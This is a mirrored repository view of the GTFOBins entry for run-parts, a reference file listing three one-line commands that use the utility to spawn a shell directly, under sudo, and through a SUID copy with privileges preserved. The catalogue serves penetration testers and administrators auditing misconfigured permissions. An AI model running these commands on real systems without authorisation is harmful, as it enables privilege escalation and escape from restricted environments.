1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/run-parts.md

10 lines
230 B
Markdown
Raw Permalink Normal View History

2018-11-12 13:40:10 +01:00
---
functions:
shell:
- code: run-parts --new-session --regex '^sh$' /bin
sudo:
- code: sudo run-parts --new-session --regex '^sh$' /bin
suid:
- code: ./run-parts --new-session --regex '^sh$' /bin --arg='-p'
---